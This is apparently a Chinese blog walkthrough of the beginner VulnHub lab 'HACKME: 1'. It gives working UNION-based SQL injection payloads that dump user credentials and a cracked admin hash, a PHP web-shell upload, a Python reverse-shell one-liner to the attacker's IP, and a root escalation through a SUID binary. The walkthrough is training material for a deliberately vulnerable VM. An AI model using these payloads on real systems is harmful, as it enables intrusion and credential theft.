【靶机渗透】HACKME: 1

【靶机渗透】HACKME: 1

本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1

0x01靶机介绍

1. 详情

链接 https://www.vulnhub.com/entry/hackme-1,330/
发布日期 2019年7月18日
作者 x4bx54
难度 初学者,简单

2. 描述

'hackme' is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment.

"hackme"是一个初学者难度级别的框。目标是通过 Web 漏洞获得有限的特权访问,然后将特权升级为 root。该靶机的创建是为了模拟现实生活环境。

0x02环境搭建

1. 下载靶机

官网链接直接下载

【靶机渗透】HACKME: 1_第1张图片

觉得官网下载慢的朋友,可以后台回复 H1 获取资源

2. 创建靶机

下载好后直接将ova文件拖入VMware虚拟机即可,也可以使用VirtualBox 创建

【靶机渗透】HACKME: 1_第2张图片

创建完成

3. 开启靶机

点击 ▶开启此虚拟机

【靶机渗透】HACKME: 1_第3张图片

0x03靶机渗透

攻击机使用Kali Linux (IP:192.168.64.128)

1. 主机发现

arp-scan -l

发现目标主机 192.168.64.137

【靶机渗透】HACKME: 1_第4张图片

2. 端口扫描

masscan 192.168.64.137 --rate=10000 --ports 0-65535

【靶机渗透】HACKME: 1_第5张图片

识别2个开放的tcp端口22,80

3. 服务扫描

nmap -T4 -sV -O -p22,80 192.168.64.137

-sV服务版本 -T4速度(最高为5,推荐用4) -O系统 -p 指定端口

【靶机渗透】HACKME: 1_第6张图片

22是ssh,80是Apache http服务

4. web信息收集

目录扫描工具进行扫描,看能否找到可利用信息

【靶机渗透】HACKME: 1_第7张图片

访问该链接http://192.168.64.137/register.php,是一个网站注册页面

创建一个密码为safefox的用户safefox并登录。

【靶机渗透】HACKME: 1_第8张图片

这种网站类似于图书目录查询网站

【靶机渗透】HACKME: 1_第9张图片

可能有注入点

0x04漏洞利用

1.SQL注入

尝试进行手动 SQL 注入

01-判断类型

s' or 1=1-- -

【靶机渗透】HACKME: 1_第10张图片

单引号字符型注入

02-确定显示位

使用 UNION 命令来查找其中存在的列数

s' union select 1,2-- -

【靶机渗透】HACKME: 1_第11张图片

s' union select 1,2,3-- -

【靶机渗透】HACKME: 1_第12张图片

03-查询基本信息

识别正在使用的数据库

s' union select database(),2,3-- -

【靶机渗透】HACKME: 1_第13张图片

webapphacking

识别 SQL 数据库的版本

s' union select version(),2,3-- -

【靶机渗透】HACKME: 1_第14张图片

04-查找所有数据库

s' union select schema_name,2,3 FROM information_schema.schemata-- -

【靶机渗透】HACKME: 1_第15张图片

05-获取表名

s' union select group_concat(table_name separator 0x3c62723e),2,3 from information_schema.tables where table_schema=database()-- -

【靶机渗透】HACKME: 1_第16张图片

06-获取特定表列名

获取书籍和用户的列名

s' union select column_name,2,3 from information_schema.columns where table_name = 'books' -- -

【靶机渗透】HACKME: 1_第17张图片

s' union select column_name,2,3 from information_schema.columns where table_name = 'users' -- -

【靶机渗透】HACKME: 1_第18张图片

07-获取数据

s' union select group_concat(user,":",pasword),2,3 from users -- -

【靶机渗透】HACKME: 1_第19张图片

破解superadmin用户的密码hash:superadmin:2386acb2cf356944177746fc92523983

【靶机渗透】HACKME: 1_第20张图片

superadmin:Uncrackable

2.文件上传

登录管理员用户网页,发现上传点

【靶机渗透】HACKME: 1_第21张图片

上传2.php

上传成功,并知道文件已经上传到uploads文件夹

【靶机渗透】HACKME: 1_第22张图片

尝试访问http://192.168.64.137/uploads/2.php

【靶机渗透】HACKME: 1_第23张图片

3.反弹shell

接下来使用harkbar工具传递执行 python反弹shell

http://192.168.64.137/uploads/2.php?cmd=python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.64.128",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

攻击机nc监听

【靶机渗透】HACKME: 1_第24张图片

反弹成功!

通过以下命令获取一个标准shell

python -c 'import pty; pty.spawn("/bin/bash")'

image-20210619200938621

4.提权

识别存在的用户

【靶机渗透】HACKME: 1_第25张图片

在/home/legacy文件夹中发现存在touchmenot二进制文件,执行touchmenot即可获取ROOT权限。

./touchmenot

【靶机渗透】HACKME: 1_第26张图片

你可能感兴趣的:(靶机渗透,安全)